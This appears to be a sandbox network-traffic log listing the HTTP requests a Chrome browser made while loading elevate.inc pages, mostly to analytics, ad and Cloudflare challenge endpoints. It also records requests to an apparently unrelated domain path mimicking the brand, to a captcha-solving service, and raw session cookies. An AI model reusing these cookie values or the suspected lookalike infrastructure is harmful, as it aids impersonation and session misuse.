          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/11308007612/?random=1749241461344&cv=11&fst=1749241461344&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /td/rul/11308007612?random=1749241461344&cv=11&fst=1749241461344&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1host: td.doubleclick.netsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetc
          Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.elevate.inc/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /integration/enabled/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/json;charset=UTF-8sec-ch-ua-mobile: ?0accept: */*origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /ab/elevateinc/check/images/net_big.d-52893f5e.png HTTP/1.1Host: reefe.com.auConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://reefe.com.au/ab/elevateinc/check/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749241460901&cv=11&fst=1749240000000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyzV91PTwv4lrGkfXmYKNRI6XHFsObIig&random=2556801564&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/qmf0x/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
          Source: global trafficHTTP traffic detected: GET /collected-forms/v1/config/json?portalId=19524073&utk= HTTP/1.1host: forms.hscollectedforms.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /ccm/collect?en=page_view&dl=https%3A%2F%2Fwww.elevate.inc%2Four-story&scrsrc=www.googletagmanager.com&frm=0&rnd=982104404.1749241461&dt=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&auid=1555450382.1749241461&navt=n&npa=0&gtm=45He5641v9174023338za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104698127~104698129&tft=1749241460575&tfd=3391&apve=1&apvf=f HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749241461344&cv=11&fst=1749240000000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyzT4YO2mbt4e-KxXYa1UVQ9pi9GX3SnQ&random=715719847&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /widget/event/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.sosec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: application/json;charset=UTF-8sec-ch-ua-mobile: ?0accept: */*origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /s/0.8.9/clarity.js HTTP/1.1host: www.clarity.mssec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: CLID=82364212aed54dd0b5c12a6bd5339a79.20250606.20260606
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749241460901&cv=11&fst=1749240000000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436z89174023338za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&label=GC8HCKaWkqIZELyBipAq&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&_tu=Cg&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyzV91PTwv4lrGkfXmYKNRI6XHFsObIig&random=2556801564&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /integration/enabled/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /init/uuid HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/qmf0x/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=94baa2087ffef0c1&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/qmf0x/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/11308007612/?random=1749241461344&cv=11&fst=1749240000000&bg=ffffff&guid=ON&async=1&gtm=45be5641v9177334436za200zb9174023338&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103200004~103233427~103351869~103351871~104653070~104653072~104661466~104661468~104667047~104698127~104698129&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&hn=www.googleadservices.com&frm=0&tiba=Trailblazing%20a%20better%20future%20for%20benefits%20%7C%20Our%20Story&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1555450382.1749241461&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwDZpuyzT4YO2mbt4e-KxXYa1UVQ9pi9GX3SnQ&random=715719847&rmt_tld=0&ipr=y HTTP/1.1host: www.google.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /test/goal HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /widget/event/w6GQ23b4dMgP1RzEeKpkDq HTTP/1.1host: api.mida.souser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /attribution_trigger?pid=3682316&time=1749241461249&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: *sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0origin: https://www.elevate.incattribution-reporting-eligible: trigger=navigation-source, not-event-sourceattribution-reporting-support: websec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749241461249&li_adsId=b2f40ce5-83c9-4356-a53c-16d12652f483&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
          Source: global trafficHTTP traffic detected: GET /dist/web/assets/google-privacy-policy-Cb0CGVRT.svg HTTP/1.1host: 2captcha.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /hs-script-loader-public/v1/config/pixels-and-events/json?portalId=19524073 HTTP/1.1host: api.hubapi.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1474083843:1749238381:eE9ysPZQfYUadE3QCqSq6WZ-hhX64N8QGXpDs6VsKog/94baa202eb60f0c1/g3viMhRDsYd1ykt1gLS23qGt_IZ.l42n5lw3WzF5XAw-1749241462-1.2.1.1-qnFvEaq_eMcsy3EJqM1uRU7fycmB08b9m6hM5SK_uekN9lTk29IKs9aFkZMA2n8K HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=kJDIl0bQYIupZwuQjSflJt8Miyv.ZjZELt_zoZJ9Wi0-1749241463-1.0.1.1-nne0Lnm38ktLsATbsKc1GjxjyJSQLJmoh4Z.R_wWmXNqgZWjSI2v.P5py.cPN9Ss9UEUhRVWx891pMyr.JAYPQbShFnkpA_UTbO3ucdnnX4; _cfuvid=0GdvqBSD9VJNz0ly7N6J71zRB2hNlqEgblh1k1LWF9g-1749241463169-0.0.1.1-604800000
          Source: global trafficHTTP traffic detected: GET /collect?v=2&fmt=js&pid=3682316&time=1749241461249&li_adsId=b2f40ce5-83c9-4356-a53c-16d12652f483&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2&cookiesTest=true HTTP/1.1host: px.ads.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=9bd8b1f7-0ad8-4894-8c33-052c74c860f9cookie: bcookie="v=2&75a3968f-c749-431c-87b1-a6549943cd00"cookie: lidc="b=VGST09:s=V:r=V:a=V:p=V:g=3221:u=1:x=1:i=1749241463:t=1749327863:v=2:sig=AQFx1M3mTADi4_qUorZE9vKYgV2mANlP"priority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/bzax3/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
          Source: global trafficHTTP traffic detected: GET /attribution_trigger?pid=3682316&time=1749241461249&url=https%3A%2F%2Fwww.elevate.inc%2Four-story&tm=gtmv2 HTTP/1.1host: px.ads.linkedin.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: GET /px/li_sync?redirect=https%3A%2F%2Fpx.ads.linkedin.com%2Fcollect%3Fv%3D2%26fmt%3Djs%26pid%3D3682316%26time%3D1749241461249%26li_adsId%3Db2f40ce5-83c9-4356-a53c-16d12652f483%26url%3Dhttps%253A%252F%252Fwww.elevate.inc%252Four-story%26tm%3Dgtmv2%26cookiesTest%3Dtrue%26liSync%3Dtrue HTTP/1.1host: www.linkedin.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: li_sugr=9bd8b1f7-0ad8-4894-8c33-052c74c860f9cookie: bcookie="v=2&75a3968f-c749-431c-87b1-a6549943cd00"cookie: lidc="b=VGST09:s=V:r=V:a=V:p=V:g=3221:u=1:x=1:i=1749241463:t=1749327863:v=2:sig=AQFx1M3mTADi4_qUorZE9vKYgV2mANlP"cookie: UserMatchHistory=AQLhhIFCsaVbnQAAAZdG6oM9hU2OtplHp7GSc4r4jaBnSbgBnMZhjMqfcAhZHCvtNTRN0OcWT9zPSQcookie: AnalyticsSyncHistory=AQIStyol2DqPtwAAAZdG6oM-4N0kwCMGTqb-SBF6hiPCZGhyzwt4pdq7C-MOLWRBddonH8EkwPFZtzhWmoWfBgpriority: i
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/bzax3/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
